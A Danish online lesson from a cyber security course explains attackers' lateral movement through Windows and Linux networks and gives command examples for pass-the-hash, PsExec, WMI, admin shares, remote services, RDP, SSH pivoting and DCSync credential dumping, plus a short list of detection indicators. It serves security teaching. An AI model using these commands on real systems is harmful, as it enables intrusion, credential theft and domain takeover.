Teknikker til lateral bevægelse
Bevæg Dem gennem netværk ved hjælp af WMI, PsExec, WinRM og SMB-shares uden at udløse alarmer.
Teknikker til lateral bevægelse er en gratis Cyber Security Academy-lektion på CoddyKit. Dette er lektion 3 af 4. Du kan læse alle 3 lektioner i dette læringsspor gratis i deres fulde længde — derefter låser CoddyKit PRO alle lektioner op samt praktiske øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Den er en del af læringsforløbet i Cyber Security Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Cyber Security Academy-kurset indeholder 4 lektioner i alt.
Hvad er lateral bevægelse?
Lateral bevægelse er det sæt teknikker, som angribere bruger til gradvist at bevæge sig gennem et netværk efter den første kompromittering — fra det første fodfæste mod mål med højere værdi, f.eks. domænecontrollere, databaser og backupsystemer.
Pass-the-Hash (PtH)
Windows NTLM-godkendelse gør det muligt at bruge adgangskodehashen direkte i stedet for adgangskoden i klartekst. En angriber, der har udtrukket NTLM-hashes, kan godkende sig på andre systemer uden at knække hashen.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHPass-the-Ticket (PtT)
Kerberos-billetter (TGT eller TGS) kan udtrækkes fra hukommelsen og importeres for at godkende sig som billetholderen. Golden Ticket-angreb forfalsker TGT'er ved hjælp af KRBTGT-hashen og giver ubegrænset Kerberos-adgang til domænet.
Ekstern kodekørsel: PSExec
psexec (Sysinternals og Impacket) kører kommandoer på eksterne Windows-værter via SMB-/administrator-delinger. Kræver administratorlegitimationsoplysninger. Opretter en tjenestebinærfil på målet.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecLateral bevægelse med WMI
Windows Management Instrumentation muliggør ekstern kodekørsel uden at oprette filer, som mange værktøjer kan registrere:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB og administrator-delinger
Windows-administrator-delinger (C$, ADMIN$, IPC$) muliggør lateral bevægelse med administratorlegitimationsoplysninger:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Eksterne tjenester: sc og at
Opret tjenester eller planlagte opgaver på eksterne systemer:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP og interaktive sessioner
RDP (Remote Desktop Protocol, port 3389) giver fuld interaktiv adgang. Angribere bruger RDP med stjålne legitimationsoplysninger. Forsvar: begræns RDP til springservere, kræv NLA, og log alle sessioner.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH som lateral bevægelse
I Linux-miljøer bruges SSH med stjålne nøgler eller legitimationsoplysninger til lateral bevægelse. Misbrug af agentvideresendelse gør det muligt at pivotere gennem kompromitterede værter. SSH-tunneler videresender porte, så systemer, der ellers er utilgængelige, kan nås.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostReplikering i Active Directory (DCSync)
DCSync misbruger AD-replikering til at hente password-hashes direkte fra DC'en uden at køre kode på den — kræver privilegiet DS-Replication-Get-Changes-All:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtRegistrering af lateral bevægelse
Registreringsindikatorer:
- Hændelse 4624 (login) med usædvanlige Type 3-login (netværk)
- Oprettelse af tjenester på eksterne værter (hændelse 7045)
- SMB-forbindelser mellem arbejdsstationer
- WMI-procesoprettelse på eksterne værter
- Unormal kontoaktivitet (bruger logger ind fra flere maskiner)
Hurtigt tjek: lateral bevægelse
Hvilken teknik gør det muligt for en angriber at godkende sig på Windows-systemer med en opsnappet NTLM-hash uden at knække den?
Opsummering af lektionen
Lateral bevægelse bruger kompromitterede legitimationsoplysninger og protokoller til at sprede sig gennem netværket. Vigtige teknikker: Pass-the-Hash (genbrug af NTLM-hash), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB til ekstern kørsel og DCSync til indsamling af domænelegitimationsoplysninger. Registrering: usædvanlige netværkslogins (hændelse 4624), oprettelse af eksterne tjenester (hændelse 7045) og SMB-trafik mellem arbejdsstationer.
Lær Cyber Security Academy med en AI-underviser — gratis
Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.
- Kurser
- 76
- Lektioner
- 303
Ofte stillede spørgsmål
Er lektionen “Teknikker til lateral bevægelse” gratis?
Ja — alle 3 lektioner i læringssporet Cyber Security Academy, inklusive “Teknikker til lateral bevægelse”, kan læses gratis i deres fulde længde her på webstedet. Derefter låser CoddyKit PRO alle lektioner op samt interaktive øvelser med en indbygget kodeeditor og en AI-underviser døgnet rundt. Cyber Security Academy-kurset indeholder 4 lektioner i alt.
Hvad lærer jeg i “Teknikker til lateral bevægelse”?
Bevæg Dem gennem netværk ved hjælp af WMI, PsExec, WinRM og SMB-shares uden at udløse alarmer. Du øver dig i Cyber Security Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.
Skal jeg have erfaring for at begynde på Cyber Security Academy?
Der kræves ingen tidligere erfaring. Cyber Security Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 3 af 4.
Hvor lang tid tager lektionen “Teknikker til lateral bevægelse”?
De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.
Kan jeg skrive og køre kode i denne Cyber Security Academy-lektion?
Ja. Alle Cyber Security Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.
Alle lektioner i dette kursus
- C2-frameworks: Cobalt Strike og Sliver
- Living-Off-the-Land-binaries (LOLBins)
- Teknikker til lateral bevægelse
- Rapportskrivning for red teams